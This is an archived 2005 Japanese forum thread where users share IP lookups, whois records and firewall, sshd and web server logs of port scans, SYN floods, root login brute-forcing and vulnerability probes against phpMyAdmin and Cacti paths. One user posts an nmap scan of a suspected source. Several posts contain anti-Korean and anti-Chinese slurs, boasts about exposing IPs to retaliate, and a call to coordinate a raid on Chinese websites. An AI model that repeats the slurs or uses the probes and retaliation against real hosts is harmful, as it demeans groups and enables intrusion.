IPアドレス 221.23.163.7 ホスト名 YahooBB221023163007.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 北海道 市外局番 -- 接続回線 xDSL ウザス
でもあれだよね。 ワームやウイルスに感染しているのであろう個人のパソコンからのってつまらないよね。 初物のときだけは興味深いけど。 企業のサーバ(自社ドメインのパソコンは少ないみたい)からのはいつでもだいたい興味深い。
>【5:2】俺のパソコンに悪戯出来る?wwwww
>1 名前:192.168.0.774 2005/07/22(金) 23:35:48 ID:qtF8aNrk
> IPアドレス 221.23.163.7
> ホスト名 YahooBB221023163007.bbtec.net
> IPアドレス
> 割当国 ※ 日本 (JP)
> 都道府県 北海道
> 市外局番 --
> 接続回線 xDSL
> ケッ、ハッキングなんかできるわけねえんだよバーカ
インターネット板にこんな糞スレ立てた香具師がいるよ。
>>433 とまるっきり同じ。
>>435 これ書いたの、
>>433 氏だったりして? 仕返しに。
でもおそらく踏み台になってるゆるいパソコンだろうから可能かもね。
IPアドレスかわって違う人のパソコンになってるかもしれないけど。
ただ
>>433 氏もポート書いてないから、向こうのパソコンが何に侵されてるのか分かんないね。
Windowsでパッチ当ててないPCが多すぎだよな。 うちのSMTP鯖には踏台からの足跡が多数ある。
わろち
そもそもマイクロソフトが月例アップデートにするから対応が遅れるんだ
IPアドレス 220.254.43.7 ホスト名 janis220254043007.janis.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 長野県 市外局番 -- 接続回線 種別不明 TCPシンフラッド(゚听)イラネ
442 :
名無しさん@お腹いっぱい。 :2005/07/24(日) 10:53:48
ちょっとお聞きしたいのですが ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 香港 (HK) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし Whois 検索結果 IPアドレス 所有者情報 Whois Server にアクセスできません。 Error No.: Error Message: ドメイン 所有者情報 -- 一応これは僕のHPの掲示板に毎回くる荒らしなんですが。IP検索したらこのように 出ました この場合荒らしは香港に住んでいると考えてよいのでしょうか?
443 :
名無しさん@お腹いっぱい。 :2005/07/24(日) 11:20:40
61.199194.120 jpnic-net-jp なにこいつwwwww uzeeee
>>442 もしかして:プロキシ経由接続で書き込み
ヒント:プロキシ経由の書き込みを遮断
ヒント2:わからない単語はぐぐって調べる
whoisも使えねー奴に貼られても信憑性ねーよw
447 :
名無しさん@お腹いっぱい。 :2005/07/24(日) 16:41:36
etnum: 220.72.0.0 - 220.87.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
admin-c: DL248-AP
tech-c: GK40-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed:
[email protected] 20020829
status: ALLOCATED PORTABLE
changed:
[email protected] 20041007
source: APNIC
% APNIC database, last updated 20050719 23:00:33
意味のないヤツ
nortonが反応。 IPアドレス219.210.196.35のコンピュータが BD NetBus Pro 2.0の攻撃の特性を持った情報を送りました。 と言っている… IP:219.210.196.35 Network:BBTECH Location:Japan Node Name:YahooBB21921019635.bb で、BD〜で検索かけたらこのスレに辿り着いた。
↓ウザイ 63.86.180.203.dy.bbexcite.jp
意味の無い おまえがうざい
2005/07/24(01:47:45) W-SV 210.109.85.7 [80] 404 0 "GET /phpmyadmin/main.php HTTP/1.1" 2005/07/24(02:36:53) W-SV 82.68.32.216.reverse.layeredtech.com(216.32.68.82) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( dummy ) 2005/07/24(20:14:21) W-SV 195.58.6.134 [80] 400 0 "GET phpmyadmin/index.php HTTP/1.1" これらも脆弱性アタックかな。しらんけど。 他に例のawなんたらに文字くっつけてきたやつと/アタックが来た。
453 :
名無しさん@お腹いっぱい。 :2005/07/25(月) 14:24:05
61.190.121.208 から TCP 1433, 445, 1025, 139 へ PortScanされました。 2005/07/24 16:54:08 IP検索しても IPアドレス 61.190.121.208 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし Whois 検索結果 IPアドレス 所有者情報 Whois Server にアクセスできません。 Error No.: Error Message: ドメイン 所有者情報 -- で判りません。一体なんなんでしょうか?
>>452 ユニークな文字列で検索したらだいたいわかるでよ。
phpmyadminもcactiも脆弱性狙いですな。
>>453 >TCP 1433, 445, 1025, 139 へ
開けとるの?ルータかパソコンのファイアウォールで閉めときゃ。
IPアドレス 12.158.80.10 ホスト名 crl.verisign.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし シンフラッドはもうご馳走様ですよ、ねえさん
456 :
名無しさん@お腹いっぱい。 :2005/07/25(月) 23:46:48
458 :
名無しさん@お腹いっぱい。 :2005/07/26(火) 00:56:24
X-Apparently-To: @yahoo.co.jp via web2302.mail.yahoo.co.jp; Tue, 26 Jul 2005 00:37:14 +0900
Return-Path: <
[email protected] >
Received: from mail.excite.co.jp (210.150.10.186)
by mta38.mail.bbt.yahoo.co.jp with SMTP; Tue, 26 Jul 2005 00:37:14 +0900
Received: (qmail 66202 invoked by uid 65534); 26 Jul 2005 00:37:14 +0900
Date: 26 Jul 2005 00:37:14 +0900
Message-ID: <
[email protected] >
From: <
[email protected] >
To:
[email protected] Subject: =?ISO-2022-JP?B?GyRCIUobKEI0GyRCIUsbKEIgGyRCInYjUyNNI0EjUCJ2I0YjQ0V2M05HJzpRISFKITIsJUkhPCVgGyhCOC8xMhskQiFKNmIhSyMyS2dPIkhWJE43bxsoQg==?=
X-Priority: 3
X-Antivirus: AVG for E-mail 7.0.338 [267.9.4]
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=iso-2022-jp
>>456 IEで見てますよ。 ボタン押すと出てくる言葉遣いが中国ぽい日本語
IPアドレス 210.151.209.157 ホスト名 FLA1Abs157.aic.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 愛知県 市外局番 -- 接続回線 xDSL
IPアドレス 202.225.33.130 ホスト名 FLH1Acu130.kng.mesh.ad.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 光
IPアドレス 210.234.172.74 ホスト名 X172074.ppp.dion.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 神奈川県 市外局番 -- 接続回線 xDSL
466 :
名無しさん@お腹いっぱい。 :2005/07/26(火) 19:38:02
KHP059140116080.ppp-bb.dion.ne.jp ↑ ウイルスばら撒き厨
>>463 なんか知らんがポート7743突いてくる
nyやってないのにw
IPアドレス 210.64.203.161 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 台湾 (TW) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし IPアドレス 222.243.205.78 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ポート3389突いてくる
IPアドレス 218.52.198.163 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) しつこいなこいつらは!!
472 :
名無しさん@お腹いっぱい。 :2005/07/27(水) 01:52:23
どうやってIPから調べるんですか!?
テンプレくらい見ろよ
うーむ、www鯖にワーム仕込もうとする攻撃が増えてきたぞ。 かつてのnimdaさわぎみたいにならんかな。 無線アクセスと思しきアドレスちらほら
475 :
名無しさん@お腹いっぱい。 :2005/07/27(水) 11:06:55
無線LANのホストに鍵掛けないで、ご近所さんに入られて ルーターの設定変えられた勇者はおらんとですか?
476 :
名無しさん@お腹いっぱい。 :2005/07/27(水) 14:40:47
わざとご近所さんに入られるように罠を 仕掛けた猛者はいませんか?
ハニー・ポッターとご近所さんの部屋
210.153.170.241(pl113.nas931.yokkaichi.nttpc.ne.jp) ポート 1220 210.196.176.184(gw-kddi2-184.digirock.jp) ポート 1210 210.166.236.143 ポート 1198
211.22.80.2 222.148.235.15 222.148.117.200 222.148.50.173 222.148.16.193 218.175.95.199 222.148.66.171 61.152.158.152 222.148.235.15 222.148.245.189 222.148.45.54 222.232.7.77 222.148.50.173 222.126.65.213 222.148.39.104 201.19.73.242 222.148.122.121 222.148.245.189 222.148.159.117 222.148.50.173 206.113.110.190 222.148.118.211 222.148.104.64 222.148.245.189 222.148.119.76 222.148.194.64 61.152.158.124 222.148.118.211 222.148.61.237 222.148.59.118 222.181.15.23 222.148.63.98 222.148.61.36 セキュリティログに凄い残ってる つか2〜3分毎に数秒感覚で来てる
07/28/2005 07:19:52.496 - FTP: PORT bounce attack dropped. - Source:80.55.234.94, 35412
2005/07/28(12:13:20) W-SV 165.132.78.27 [80] 302 29 "HEAD / HTTP/1.1" ( dummy ) 今度は/だけどGETじゃなかった。
YahooBB219208026001.bbtec.net
なぁ、IP直叩きの GET / 系って山田サーチとか…
07/29/2005 14:30:54.640 - SYN flood attack dropped - Source:61.120.98.24, 1428
486 :
こいつしつこい :2005/07/29(金) 16:38:19
inetnum: 220.72.0.0 - 220.87.255.255
netname: KORNET
descr: KOREA TELECOM
descr: Network Management Center
country: KR
admin-c: DL248-AP
tech-c: GK40-AP
remarks: ***********************************************
remarks: KRNIC of NIDA is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the NIDA Whois DB
remarks:
http://whois.nida.or.kr/english/index.html remarks: ***********************************************
mnt-by: MNT-KRNIC-AP
mnt-lower: MNT-KRNIC-AP
changed:
[email protected] 20020829
status: ALLOCATED PORTABLE
changed:
[email protected] 20041007
source: APNIC
% APNIC database, last updated 20050728 23:00:32
whoisだけで楽しいですか?
ストレス解消のために貼るだけって奴多いな 読む側に情報提供する気がカケラもないから読んでもつまらん
ここに貼るだけでストレス解消できるなんて幸せな奴らだな。
Jul 29 20:50:06 sst sshd[4137]: refused connect from usen-221x246x161x26.ap-US01.usen.ad.jp Jul 29 20:55:10 sst sshd[3728]: refused connect from usen-221x246x161x26.ap-US01.usen.ad.jp
492 :
名無しさん@お腹いっぱい。 :2005/07/30(土) 04:53:05
俺は反日サイトで晒して楽しんでるよwww 進入してくるから悪い 困ってるんだろうな 痛い目にあわせないとね
>>492 そんなもんそこの国の警察にメール送ればいいだろ。ログと一緒にな。
まぁ中国人は低脳ばっかだから対応するかわからないけどな
(´・ω・`) スマン。なんか中国ってことになってる
Probable TCP FIN scan - Source:210.190.142.146, 80 Malformed IP packet dropped. - Source:60.36.140.151, 3844 Possible SYN flood attack - Source:61.116.48.234, 49400 Possible SYN flood attack - Source:203.98.164.141, 13224 Possible SYN flood attack - Source:60.37.211.38, 33673 Sub Seven Attack Dropped - Source:210.107.22.168, 3271 Possible SYN flood attack - Source:210.107.22.168, 3278 Malformed IP packet dropped. - Source:70.84.255.210, 80 Possible SYN flood attack - Source:203.98.177.91, 41243 Possible SYN flood attack - Source:203.98.177.91, 41243 Ping of death blocked - Source:219.107.45.218, 8 IP spoof detected - Source:10.5.66.131, 137 Probable TCP FIN scan - Source:210.189.90.1, 80 Net Spy Attack Dropped - Source:218.94.10.118, 39898
Possible Port Scan Dropped - Source:210.249.2.172, 4734 Possible SYN flood attack - Source:172.200.16.229, 52589 Probable TCP FIN scan - Source:210.188.250.237, 80 Possible Port Scan Dropped - Source:210.221.36.104, 4973 Possible SYN flood attack - Source:203.98.177.91, 44512 Possible Port Scan Dropped - Source:210.245.212.119, 3490 Probable TCP FIN scan - Source:210.188.250.237, 80 Possible SYN flood attack - Source:210.249.146.90, 4685 Possible Port Scan Dropped - Source:210.249.20.17, 4496
Jul 30 12:43:21 hoge sshd[2571]: Failed password for root from 221.253.61.253 port 37320 ssh2 Jul 30 12:43:22 hoge sshd[2575]: Failed password for root from 221.253.61.253 port 37330 ssh2 Jul 30 12:43:22 hoge sshd[2578]: Failed password for root from 221.253.61.253 port 37344 ssh2 Jul 30 12:43:22 hoge sshd[2581]: Failed password for root from 221.253.61.253 port 37758 ssh2 Jul 30 12:43:23 hoge sshd[2584]: Failed password for root from 221.253.61.253 port 37771 ssh2
本日2回目のご訪問 IP Address 172.179.44.199 Network america online Location Dulles.VA.USA Node Name ACB32CC7.ipt.aol.com
Jul 30 01:53:45 saba sshd[6011]: refused connect from l198007.ppp.asahi-net.or.jp Jul 30 02:01:57 saba sshd[5667]: refused connect from l198007.ppp.asahi-net.or.jp Jul 31 00:08:30 saba sshd[2988]: refused connect from usen-221x243x28x75.ap-US01.usen.ad.jp Jul 31 00:13:30 saba sshd[3104]: refused connect from usen-221x243x28x75.ap-US01.usen.ad.jp ハイハイ
IPアドレス 221.154.149.247 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし IPアドレス 217.132.75.149 ホスト名 CBL217-132-75-149.bb.netvision.net.il IPアドレス 割当国 ※ イスラエル (IL) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
∩___∩ | ノ ヽ ! / ● ● | こいつすげえアホ | ( _●_) ミ 彡、 |∪| / .\ / __ ヽノ / \ ...\ (___) / .│ ..│ │ │ / ヽ l..lUUU .U
503 :
502 :2005/07/31(日) 11:18:25
IPアドレス 61.205.190.74 ホスト名 zaq3dcdbe4a.zaq.ne.jp 割当国 ※ 日本 (JP) 都道府県 兵庫県 接続回線 CATV ***.zaq.ne.jpからいろんなポートにピョコピョコやってるんですがなんなんでしょう。
61.205.99.198 同上
2005/08/01(14:54:23) W-SV 218.12.35.10 [80] 400 0 "GET http//www.sina.com.cn/ HTTP/1.1" ( dummy ) プロキシなんかやってねーよバカ死ね inetnum: 218.11.0.0 - 218.12.255.255 netname: CNCGROUP-HE country: CN descr: CNCGROUP Hebei province network
509 :
名無しさん@お腹いっぱい。 :2005/08/02(火) 04:11:03
i60-35-23-249.s02.a001.ap.plala.or.jp
話すと何かしてくれるのかい?
512 :
名無しさん@お腹いっぱい。 :2005/08/03(水) 03:27:32
IPアドレス220.57.188.85 ホスト名YahooBB220057188085.bbtec.net IPアドレス 割当国 日本 (JP) 都道府県沖縄県 市外局番-- 接続回線xDSL こらしめてやって
なんか…中国人にアタックされるとなんかムカつく
515 :
名無しさん@お腹いっぱい。 :2005/08/03(水) 14:58:38
221.24.143.14 こいつ何者?
221.24.143.14 ホスト名 YahooBB221024143014.bbtec.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 静岡県 市外局番 -- 接続回線 xDSL
2005/08/03 20:54:29通信の要求210.143.128.26TCP(2134) 2005/08/03 20:08:10通信の要求210.143.128.26TCP(1635) 2005/08/03 18:35:56通信の要求210.143.128.26TCP(4798) 2005/08/03 17:50:05通信の要求210.143.128.26TCP(4006) 2005/08/03 17:03:40通信の要求210.143.128.26TCP(3628) 2005/08/03 14:47:00通信の要求210.143.128.26TCP(2830) 2005/08/03 14:40:00通信の要求206.223.151.67TCP(2919) 2005/08/03 14:39:28通信の要求210.135.97.29TCP(2917) 2005/08/03 14:29:26通信の要求206.223.151.67TCP(2771) 2005/08/03 14:18:04通信の要求206.223.151.67TCP(2685) 2005/08/03 14:07:34通信の要求206.223.151.67TCP(2638) 2005/08/03 14:01:09通信の要求210.143.128.26TCP(2071) 2005/08/03 13:14:18通信の要求210.143.128.26TCP(1071) 以上、本日のアウポのログです。
adsl-19-160.swiftdsl.com.au どこの国のヤツだろ?
オーストラリアじゃないのか?
521 :
名無しさん@お腹いっぱい。 :2005/08/03(水) 23:31:08
不正アクセスて何?
522 :
名無しさん@お腹いっぱい。 :2005/08/03(水) 23:35:21
IPアドレス 220.168.143.205 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 厨蚊w
523 :
名無しさん@お腹いっぱい。 :2005/08/03(水) 23:49:11
210.114.206.102 韓国 210.114.132.209 韓国 218.66.104.140 中国 61.177.202.102 中国 61.185.142.12 中国 この国の方たち、暇なんですね。
524 :
名無しさん@お腹いっぱい。 :2005/08/04(木) 07:02:29
IPアドレス 81.190.207.148 ホスト名 host-81-190-207-148.gorzow.mm.pl IPアドレス 割当国 ※ ポーランド (PL) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 厨寒以外にイスラエルやらポーランドから来る・・・
525 :
名無しさん@お腹いっぱい。 :2005/08/04(木) 11:17:06
>>524 NeoTraceで見てみたら、
ポーランド南部のチェコ国境近いところが発信源みたいね。
526 :
名無しさん@お腹いっぱい。 :2005/08/04(木) 11:50:19
今日は朝から日本各地のSo-netからアクセスされまくり。 なんなんだこいつら。
>>526 俺はプロバこそまちまちなんだが日本各地からやってきてるのが圧倒的に多い。
1分単位でログに記録されまくり
何これ
うん、今日はやたら国内からが多い。 なにかそれ系の人たちのイベントでもあるのかねえ?w
新ワーム発見。 どこにどう通報すればいい? テレネットサービス閉じても意味がないみたいだが
08/03/2005 21:29:14.144 - SYN flood attack dropped - Source:220.147.8.60, 1350
60.8.147.220.in-addr.arpa name = eatkyo489060.adsl.ppp.infoweb.ne.jp.
Authoritative answers can be found from:
8.147.220.in-addr.arpa nameserver = ns1.hyper.web.ad.jp.
8.147.220.in-addr.arpa nameserver = ns2.hyper.web.ad.jp.
8.147.220.in-addr.arpa nameserver = ns3.hyper.web.ad.jp.
ns1.hyper.web.ad.jp internet address = 202.248.0.3
ns2.hyper.web.ad.jp internet address = 202.248.0.59
ns3.hyper.web.ad.jp internet address = 210.131.113.124
Starting nmap 3.48 (
http://www.insecure.org/nmap/ ) at 2005-08-04 15:50 JST
Interesting ports on eatkyo489060.adsl.ppp.infoweb.ne.jp (220.147.8.60):
(The 1016 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
23/tcp filtered telnet
75/tcp filtered priv-dial
80/tcp filtered http
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
IPアドレス 64.94.110.11 ホスト名 crl.verisign.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし 米帝めシンフラッドはご馳走様だつの
IPアドレス 193.108.154.169 ホスト名 a193-108-154-169.deploy.akamaitechnologies.com IPアドレス 割当国 ※ 欧州連合 (EU) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし アカマイテクノロジー?
533 :
名無しさん@お腹いっぱい。 :2005/08/04(木) 22:52:08
8/5金 20:00 集合 21:00 集団訪問開始予定です。
8/6土 20:00 集合 21:00 集団訪問開始予定です。
★拠点
【友好交流】ハ´;)BAKKER VS VIPPER(´・ω【+盆祭+】112
http://ex11.2ch.net/test/read.cgi/news4vip/1122907493/ 2chan専用プラウザをお勧めいたします。
民間の反日系中国ウエッブサイトへの抗議をしてくださる、お持ちの知識・技術を活用してくださる 等
・ ・ ・ ・
日 中 友 好 目的 での、ご参加をお待ちしております。
「友 好」は「謝罪と賠償」じゃないです(´・ω・`)
534 :
名無しさん@お腹いっぱい。 :2005/08/05(金) 00:57:37
60.41.35.177 ホスト名 i60-41-35-177.s05.a013.ap.plala.or.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光
糞の役にも立たないレスだなしかし
昼 ( ´,_ゝ`) 口つ
2005/08/04(23:42:32) W-SV 61-222-177-146.HINET-IP.hinet.net(61.222.177.146) [80] 302 29 "HEAD / HTTP/1.0"
正直セキュリティ板はシスログをコピペしたい時、書き込みサイズ制限が 厳しすぎて貼るきがせん。
microsoft-ds (445/tcp) attack 社内 LAN 丸ごとうぃるす漬け 61.193.161.35 (dns1.wacatta.com.) 61.193.161.40 (www2.wacatta.com.) 61.193.161.41 (www3.wacatta.com.) 61.193.161.50 (www.e-nj.biz.) 61.193.161.51 (manage.e-nj.biz.) Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.193.161.32/27 b. [ネットワーク名] WACATTALAND f. [組織名] エヌ・ジェイ出版販売株式会社 g. [Organization] N J PUBLISHING SALES Co., Ltd. m. [管理者連絡窓口] YK7718JP n. [技術連絡担当者] YT5350JP p. [ネームサーバ] [割当年月日] 2001/08/27 [返却年月日] [最終更新] 2001/08/28 10:16:03(JST) 上位情報 ---------- 株式会社アイ・ピー・レボルーション (IP Revolution Inc.) [割り振り] 61.193.160.0/19 株式会社アイ・ピー・レボルーション (IP Revolution Inc.) SUBA-440-034 [SUBA] 61.193.161.0/24
IPアドレス 221.138.68.59 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし だから氏ねよもう。
211.243.235.47 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
バカチョンうざいね
はてなダイアリーに行った次の日…。 なにか御用ですか? a. [IPネットワークアドレス] 221.186.146.24/29 b. [ネットワーク名] HATENA f. [組織名] 株式会社はてな g. [Organization] Hatena co.,ltd. m. [管理者連絡窓口] JK1197JP n. [技術連絡担当者] JK1197JP
59.187.27.143 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
IPアドレス 206.223.151.67 ホスト名 tiger509.maido3.com IPアドレス 割当国 ※ アメリカ合衆国 (US) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ポートスキャンしてきやがった maidoじゃねぇよボケ
IPアドレス 221.154.109.198 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし チョンチョンチョンチョンチョンチョンチョンばっかり
あっち行ってチョンチョンこっち来ないでチョン♪
2005/08/07(22:11:02) W-SV solaris.matti.ee(194.126.98.135) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( dummy ) 2005/08/07(00:56:45) W-SV ns2.stadtmission-butzbach.de(62.141.57.165) [80] 404 0 "GET /cacti/graph_image.php HTTP/1.1" ( dummy ) また何かのスクリプトの脆弱性を利用しようとしてるのかな。
昨日(05/08/07)、TCP 80 へアクセスした人たち。 Port 80 へアクセスするウィルスの代表的なものは何だろう。 060.036.198.207 Plala Networks Inc. 218.047.216.205 Plala Networks Inc. 220.108.004.152 Plala Networks Inc. 220.108.138.191 Plala Networks Inc. 220.221.128.012 Plala Networks Inc.
557 :
名無しさん@お腹いっぱい。 :2005/08/08(月) 12:09:21
中国221.231.10.194:2103 神奈川218.141.148.30:4825 愛知202.179.58.1:2126 福岡220.59.52.36:3577 福岡218.114.136.125:4942 助けてーうじゃうじゃ来るよー
558 :
554 :2005/08/08(月) 12:39:13
>>556 さんくす。これの他にはいつもの/アタックだった。
IPアドレス 218.66.104.140 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 中国 (CN) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし こいつ終日不正アクセスしやがる。 鯖が使えれば仕返しが出来るが 当方鯖禁止のISPなもので・・・
1. 2005/08/09|14:51:55| Port scan attempt 220.76.154.33 9 2. 2005/08/09|13:49:20| Port scan attempt 220.107.156.55 3 3. 2005/08/09|11:45:01| Port scan attempt 220.107.37.125 4 4. 2005/08/09|11:38:37| Port scan attempt 220.107.156.55 9 5. 2005/08/08|23:05:47| Port scan attempt 219.164.88.12 2 6. 2005/08/08|23:05:46| Port scan attempt 220.86.18.27 1 7. 2005/08/08|23:05:39| Port scan attempt 59.11.120.204 1 8. 2005/08/08|14:21:02| Netbus/GabanBus 220.72.183.104 2 9. 2005/08/08|11:37:13| Port scan attempt 58.89.87.230 1 10. 2005/08/08|06:00:11| Port scan attempt 210.161.163.142 2 11. 2005/08/07|02:41:03| Port scan attempt 60.39.50.245 6 12. 2005/08/06|05:59:38| Port scan attempt 218.153.224.43 1 13. 2005/08/05|10:38:35| Port scan attempt 219.131.215.180 14 14. 2005/08/04|23:00:29| Port scan attempt 222.103.134.7 1 15. 2005/08/04|21:08:35| Port scan attempt 219.139.243.18 3 16. 2005/08/04|15:18:48| Netbus/GabanBus 211.177.173.194 2 17. 2005/08/04|00:07:17| Port scan attempt 220.168.198.135 1 18. 2005/08/03|23:06:21| Port scan attempt 211.107.241.198 1 19. 2005/08/03|20:58:14| Port scan attempt 220.169.183.111 2 20. 2005/08/03|20:18:13| Port scan attempt 220.77.203.136 3
2005/08/10(10:40:10) W-SV 222.187.114.2 [80] 400 0 "GET http//219.133.51.40/getimage?0.8821770718181844 HTTP/1.1" ( dummy ) 串利用試してんじゃねー氏ね
IPアドレス 210.146.90.72 ホスト名 072090.146210.hyogo.h555.net IPアドレス 割当国 ※ 日本 (JP) 都道府県 兵庫県 市外局番 -- 接続回線 xDSL しつこい
IPアドレス 221.242.10.50 ホスト名 221x242x10x50.ap221.ftth.ucom.ne.jp IPアドレス 割当国 ※ 日本 (JP) 都道府県 東京都 市外局番 -- 接続回線 光 ゆーこむ
IPアドレス 82.212.170.207 ホスト名 82-212-170-207.teledisnet.be IPアドレス 割当国 ※ ベルギー (BE) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし IPアドレス 217.136.32.113 ホスト名 113.32-136-217.adsl.skynet.be IPアドレス 割当国 ※ ベルギー (BE) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし ※民主党・大阪府連のサイト内、水島広子議員サイトへのリンクが問題の サイトへのリンクとなっている。 ていう問題で、喜んでそのエロサイト見てたらなぜかベルギーからなんかキタw
IPv4 Address : 211.242.60.0-211.242.60.255 Network Name : KMCB Connect ISP Name : DREAMX Connect Date : 20020426 Registration Date : 20020516 [ Organization Information ] Organization ID : ORG87205 Org Name : KMCB State : KYONGBUK Address : San89-14, Otae-dong, Gumi-si Zip Code : 730-140 朝鮮人乙
IPアドレス 221.147.173.150 ホスト名 対応するホスト名がありません IPアドレス 割当国 ※ 韓国 (KR) 都道府県 該当なし 市外局番 該当なし 接続回線 該当なし
2005/08/10(08:37:30) W-SV nthygo089041.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.215.41) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/08/10(11:30:52) W-SV nthygo089041.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.215.41) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/08/10(13:18:45) W-SV nthygo089041.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.215.41) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/08/10(14:31:04) W-SV nthygo089041.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.215.41) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/08/10(14:54:19) W-SV nthygo089041.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.215.41) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 2005/08/11(13:21:40) W-SV nthygo092125.hygo.nt.adsl.ppp.infoweb.ne.jp(222.159.228.125) [80] 302 29 "GET / HTTP/1.0" ( dummy ) 最近このnthygo******.hygo.nt.adsl.ppp.infoweb.ne.jpってのが/アタックしまくりだけど、 全部同じPCでモデム切るごとに変わってるだけのような気がしてならない。 /アタックするウイルスでも飼ってるのかな。
568 :
名無しさん@お腹いっぱい。 :2005/08/12(金) 11:02:58
ちょん 220.230.42.123 DREAMX KOREA
久々の攻撃 IPアドレス 219.107.254.214 ホスト名 FLA1Aam214.fko.mesh.ad.jp 割当国 日本 (JP) 都道府県 福岡県 接続回線 xDSL ポートスキャンしてきますた(`・ω・´)
支那 219.154.195.117(CNCGROUP Henan province network) 222.217.221.90(CHINANET Guangxi province network) 終日、ランダムなポート番号にアクセス うざい!
一日あたり300件ほど外部からの接続要求があるのですが ふつうですか? 最近ログとり始めてびっくりしてます。
572 :
名無しさん@お腹いっぱい。 :2005/08/13(土) 01:45:45
姦国 211.195.219.222 KRNIC-KR
573 :
名無しさん@お腹いっぱい。 :2005/08/13(土) 11:01:06
こいつスパムばっかりうざい Network Information: [ネットワーク情報] a. [IPネットワークアドレス] 61.126.72.0-61.126.255.255 b. [ネットワーク名] OCN p. [ネームサーバ] ns-kg001.ocn.ad.jp/61.126.96.0-61.126.255.255 p. [ネームサーバ] ns-kn001.ocn.ad.jp/61.126.96.0-61.126.255.255 p. [ネームサーバ] ns-os001.ocn.ad.jp/61.126.72.0-61.126.95.255 p. [ネームサーバ] pns.ocn.ad.jp/61.126.72.0-61.126.95.255 [割当年月日] 2001/02/09
ocnの情報出されても意味ネー ここアホ多いね。
575 :
名無しさん@お腹いっぱい。 :2005/08/13(土) 12:27:12
>>571 普通じゃないだろww
あ〜最近不正アクセスこないなー
127.0.0.1からのアタックが止まりません どこの馬鹿野郎なんだ・・・
>>576 おお!奇遇だな、漏れもだ。
νで親切な人にファイヤーウォールソフト貰って入れたら、毎日こんなのばっか。
SorthAddress:127.0.0.1
DistinationAddress:202.249.129.34
で、下の攻撃元IP調べたらなんと「ns4.asahi.com」だってよ。
クソアカヒども、反日垂れ流しじゃ飽き足らず
2chネラを狙ったアタックまでしてきやがんのかw
もう一人の自分だよ
不正アクセス待ってます。 私のところまで来てくださいね。
580 :
名無しさん@お腹いっぱい。 :2005/08/13(土) 13:58:08
>>576-577 ,..-──- 、
/. : : : : : : : : : \
/.: : : : : : : : : : : : : : ヽ
,!::: : : :,-…-…-ミ: : : : :',
r、r.r {:: : : : :i /" '\i: : : : :}
r |_,|_,|_,|{: : : : | (・ ) (・ )、|: : : ::} 127.0.0.1がなんだって?
|_,|_,|_,|/.{ : : : :| ,.、 |:: : : :;! ハァ ?
|_,|_,|_人そ(^i :i ,´⌒⌒ )| : : :ノ
| ) ヽノ |イ!(ーノ ̄i-/゙ イゞ
